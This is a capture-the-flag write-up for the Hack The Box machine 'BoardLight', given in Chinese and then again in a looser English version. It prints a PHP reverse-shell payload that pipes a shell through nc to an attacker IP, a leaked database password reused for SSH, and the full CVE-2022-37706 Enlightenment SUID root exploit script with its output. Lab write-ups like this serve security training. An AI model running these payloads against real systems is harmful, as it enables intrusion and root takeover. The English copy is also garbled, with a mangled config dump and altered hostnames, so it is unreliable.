htb boardlight
Information Gathering
# Nmap 7.98 scan initiated Wed Dec 31 20:29:46 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11
Host is up (0.14s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 42.763 days (since Wed Nov 19 02:11:48 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 31 20:30:03 2025 -- 1 IP address (1 host up) scanned in 16.57 secondsVulnerability Analysis
通过浏览网页获得主机名board.htb
因为web是静态的,寻找vhost
➜ BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ.board.htb" -fw 6243
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]Dolibarr 17.0.0 → CVE-2023-30253
Exploitation (User Flag)
尝试凭据admin:admin可以进入
<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>进入后
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 *:*
# 数据库开放的
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ less conf.php
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
$dolibarr_main_db_type='mysqli';
$dolibarr_main_db_character_set='utf8';
$dolibarr_main_db_collation='utf8_unicode_ci';
// Authentication settings
$dolibarr_main_authentication='dolibarr';我们看到家目录含有larissa用户
尝试ssh连接
➜ BoardLight ssh larissa@board.htb
# 输入密码serverfun2$2023!!即可得到shell
Privilege Escalation (Root Flag)
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1根据搜索得到CVE-2022-37706
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Trying to find the vulnerable SUID file..."
echo "[*] This may take few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] Couldn't find the vulnerable SUID file..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Trying to pop a root shell!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///netlarissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
# id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)Lessons Learned
看到数据库账号密码应该先去尝试一下ssh,而不是直接进入数据库寻找hash
htb boardlight
Information Gathering
# Nmap 7.98 scan initiated on Wednesday, December 31, 2025, at 20:29:46, as follows:
# /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.11
Nmap scan report for 10.10.11.11:
Host is up (latency: 0.14 seconds).
998 closed TCP ports were not displayed (reset).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 06:2d:3b:85:10:59:ff:73:66:27:7f:0e:ae:03:ea:f4 (RSA)
| 256 59:03:dc:52:87:3a:35:99:34:44:74:33:78:31:35:fb (ECDSA)
|_ 256 ab:13:38:e4:3e:e0:24:b4:69:38:a9:63:82:38:dd:f4 (ED25519)
80/tcp open http Apache httpd 2.4.41 (Ubuntu)
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The site does not have a title (format: text/html; charset: UTF-8).
| http-methods:
| Supported methods: GET, HEAD, POST, OPTIONS
Device type: General purpose
Operating system: Linux 4.X|5.X
OS classification (CPE): cpe:/o:linux:linux_kernel:4, cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 – 5.19
Uptime: Approximately 42.763 days (since Wednesday, November 19, 2025, 02:11:48)
Network distance: 2 hops
TCP sequence prediction difficulty: 259 (Difficult!)
IP ID sequence generation: All zeros
Service information: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Data files were read from: /usr/share/nmap
Any incorrect results should be reported at: https://nmap.org/submit/
# Nmap completed on Wednesday, December 31, 2025, at 20:30:03 – 1 IP address (1 host up) was scanned in 16.57 seconds.Vulnerability Analysis
The host name “board.htb” was obtained by browsing the website. Since the website is static, we searched for the vhost file using Dirbuster:
➜ BoardLight ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://board.htb/ -H "Host: FUZZ_board.htb" -fw 6243
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]The found vulnerability is related to Dolibarr 17.0.0; reference: CVE-2023-30253.
# Exploitation (User Flag)
Attempt to gain access using the credentials `admin:admin` was successful.
```bash
<?PHP system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.5 4444 > /tmp/f");?>After gaining access:
www-data@boardlight:~/html/crm_board.htb/htdocs/conf$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 *:80 *:*The database is exposed
www-data@boardlight:~/html/crm_board.htb/htdocs/confdolibarr_main_url_root=‘http://crm.board.htb’; dolibarr_main_url_root_alt(‘/custom’; dolibarr_main_data_root(‘/var/www/html/crm.board.htb/documents’; dolibarr_main_db_port=‘3306’; dolibarr_main_db_prefix=‘llx_’; dolibarr_main_db_pass=‘serverfun2dolibarr_main_db_type=‘mysqli’; dolibarr_main_db_collation=‘utf8_unicode_ci’; // Authentication settings $dolibarr_main_authentication=‘dolibarr’;
We can see that the home directory contains a user named `larissa`.
Let's try to establish an SSH connection:
```bash
➜ BoardLight ssh larissa@board.htb
# Enter the password: serverfun2$2023!!This should grant us access to the shell.
Privilege Escalation (Root Flag)
larissa@boardlight:~$ find / -perm -4000 2>/dev/null
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
/usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
larissa@boardlight:~$ enlightenment --version
Version: 0.23.1According to the search results, the relevant CVE is CVE-2022-37706.
#!/bin/bash
echo "CVE-2022-37706"
echo "[*] Attempting to locate the vulnerable SUID file..."
echo "[*] This may take a few seconds..."
file=$(find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1)
if [[ -z ${file} ]]
then
echo "[-] The vulnerable SUID file was not found..."
echo "[*] Enlightenment should be installed on your system."
exit 1
fi
echo "[+] Vulnerable SUID binary found!"
echo "[+] Attempting to gain root access!"
mkdir -p /tmp/net
mkdir -p "/dev/../tmp/;/tmp/exploit"
echo "/bin/sh" > /tmp/exploit
chmod a+x /tmp/exploit
echo "[+] Enjoy the root shell :)"
${file} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), "/dev/../tmp/;/tmp/exploit" /tmp///netlarissa@boardlight:/tmp$ bash exploit.sh
CVE-2022-37706
[*] Attempting to locate the vulnerable SUID file...
[*] This may take a few seconds...
[+] Vulnerable SUID binary found!
[+] Attempting to gain root access!
[+] You have successfully obtained root access :)
mount: /dev/../tmp/: File not found in /etc/fstab.
# ID information
uid=0 (root) gid=0 (root) groups=0 (root), 4 (adm), 1000 (larissa)Lessons Learned:
When encountering database account passwords, it’s advisable to attempt an SSH connection first, rather than directly searching the database for the hash values.